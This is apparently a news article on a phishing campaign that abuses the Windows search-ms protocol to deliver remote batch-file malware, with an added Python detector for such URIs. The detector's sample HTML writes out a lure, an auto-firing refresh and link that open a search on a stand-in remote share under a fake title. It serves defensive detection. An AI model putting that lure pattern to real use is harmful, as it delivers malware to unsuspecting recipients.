Phishing emails abuse Windows search protocol to push malicious scripts

June 12, 2024 at 06:33PM

A new phishing campaign uses HTML attachments to exploit the Windows search protocol, enabling remote servers to deliver malware via batch files. Attackers can manipulate the search window’s title and force searches on remote hosts. The technique was highlighted by Prof. Dr. Martin Johns in 2020 and is now used by threat actors to evade security/AV scanners.

A new phishing campaign uses HTML attachments that abuse the Windows Search protocol (search-ms URI) to execute batch files hosted on remote servers, ultimately delivering malware. The campaign relies on two features of the protocol: it can query file shares on remote hosts, and it accepts a custom title for the search window. In a related attack chain, the attackers exploit a Microsoft Office flaw to launch such searches directly from Word documents.

The recent attacks described in the Trustwave report involve malicious emails with HTML attachments disguised as invoice documents, packed inside small ZIP archives to evade security/AV scanners. The HTML files contain code that automatically opens a malicious URL when the document is accessed, plus a clickable link to the same URL as a fallback. Through the Windows Search protocol, the attackers execute a search on a remote host with specific parameters, including a customized display name, and they use Cloudflare’s tunneling service to mask the server. The search results then show a single shortcut (LNK) file which, when clicked, triggers a batch script (BAT) hosted on the same server.
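As an added defender-side example (not code from the Trustwave report or this article), the following Python scans an HTML attachment for search-ms:/search: URIs, decodes their crumb= and displayname= parameters, and flags any search aimed at a remote UNC location. The sample HTML, its host name and the finding format are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample HTML attachment (not a real campaign artifact): a meta
# refresh that fires automatically plus a clickable fallback link, both
# pointing the Windows Search protocol at a remote share with a custom title.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0;url=search-ms:query=INVOICE&crumb=location:%5C%5Cinvoice-host.example%5Cshare&displayname=Downloads">
</head><body>
<a href="search-ms:query=INVOICE&crumb=location:\\\\invoice-host.example\\share&displayname=Downloads">Open invoice</a>
<a href="https://example.com/help">Help</a>
</body></html>"""

# Matches a search-ms: or search: URI up to the next whitespace, quote or tag delimiter.
URI_RE = re.compile(r"\b(?:search-ms|search):[^\s\"'<>]+", re.IGNORECASE)


def parse_search_uri(uri):
    """Split a search-ms:/search: URI into (scheme, {param: [values]}); keys are
    lower-cased and values percent-decoded. A URI may carry several crumb=
    parameters, hence the value lists."""
    scheme, _, rest = uri.partition(":")
    params = {}
    for part in rest.split("&"):
        key, _, value = part.partition("=")
        params.setdefault(key.strip().lower(), []).append(unquote(value))
    return scheme.lower(), params


def is_remote_location(crumb):
    """True when a crumb is location:<UNC path>, i.e. the search targets a remote host."""
    value = crumb.strip().lower()
    if not value.startswith("location:"):
        return False
    target = value[len("location:"):].lstrip()
    return target.startswith("\\\\") or target.startswith("//")


def find_suspicious_search_uris(html):
    """Return one finding per search URI in the HTML whose crumb points at a remote host."""
    findings = []
    for match in URI_RE.finditer(html):
        scheme, params = parse_search_uri(match.group(0))
        remote = [c for c in params.get("crumb", []) if is_remote_location(c)]
        if remote:
            findings.append({"scheme": scheme, "location": remote[0],
                             "displayname": params.get("displayname", [""])[0],
                             "query": params.get("query", [""])[0]})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_search_uris(SAMPLE_HTML):
        print(f"{f['scheme']}: remote search '{f['query']}' at {f['location']} titled '{f['displayname']}'")
```

A local search (crumb=location:C:\...) produces no finding, so the check keys on the remote-host behaviour the campaign depends on rather than on the protocol itself.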

To counter this threat, Trustwave recommends deleting the registry entries that register the search-ms and search URI protocol handlers, although this must be done carefully because it may also break legitimate applications and integrated Windows features that rely on them.
